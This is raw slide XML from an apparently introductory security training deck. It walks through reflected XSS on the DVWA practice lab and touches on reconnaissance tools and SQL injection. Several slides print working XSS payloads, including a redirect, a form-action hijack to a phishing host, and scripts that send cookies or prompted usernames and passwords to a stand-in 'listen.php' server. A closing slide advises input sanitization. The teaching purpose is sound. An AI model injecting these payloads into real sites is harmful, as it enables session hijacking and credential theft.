              <a:t> on the system we are?</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How can we determine network information about the system?</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How can we see what users are on the system?</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How can we learn about the hardware?</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How can we view what software is actively running on the system?</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69457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Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642"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Open browser, go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://dvwa.example.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="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username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</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Click “DVWA Security” on the left.</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Set to “low” security in the dropdown then “Submit”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Click “XSS (Reflected)” on the left.</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Enter your name in the box, click Submit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Submit generates some HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;pre&gt;Hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/pre&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and loads it. </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We can enter our own HTML (or JavaScript!) in the text box.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45938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Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="489364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JavaScript can alter many things in the browser. The alert( ); function is the most simplistic.</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In HTML, JavaScript is denoted by the &lt;script&gt; &lt;/script&gt; tags.</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In the text box, enter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“Howdy!”);&lt;/script&gt;</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A redirect would be disruptive.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "http://khan.iwar.itoc/"&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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Overwriting text too.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=”Rick Astley”&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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96249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Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11702714" cy="1938992"/>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…or worse.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=“&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=‘arnold.jpg’&gt;”&lt;/script&gt;</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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for arnold what are you talkin bout willis">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4C4960-5920-441F-B211-DCD3C0D99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217" y="2585041"/>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3086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Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="11415642" cy="5262979"/>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Phishing can lift the information from the form and hijack its destination:</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(steal data as it is input)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onsubmit</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myfunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pP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document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>btnNew.onclick</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myfunction</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document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0].action="http://myserver/phish.php";&lt;/script&gt;</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Steal cookies</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(steal authorization)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listen.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	cookie="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodeURI</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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);&lt;/script&gt;</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Fake Login Page</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(steal the users’ credentials)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;username=prompt('Please enter your username','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password=prompt('Please enter your password',' ');</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=\"http://example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>listen.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	username="+username+"&amp;password="+password+"\"&gt;");&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for cookie monster sad">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64EC6381-0345-451C-897F-8C58FC2F7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360" y="2945219"/>
            <a:ext cx="2744533" cy="21451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0229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Cross-site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10089836"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To protect against XSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sanitize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>those inputs!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Verify what the user has entered, do not blindly accept it.</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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> trust the user.</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4207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938992"/>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Network Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10712584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Network Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="830997"/>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Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>openvas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292247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SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16790103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Structured Query Language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="1938992"/>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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>criteria</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
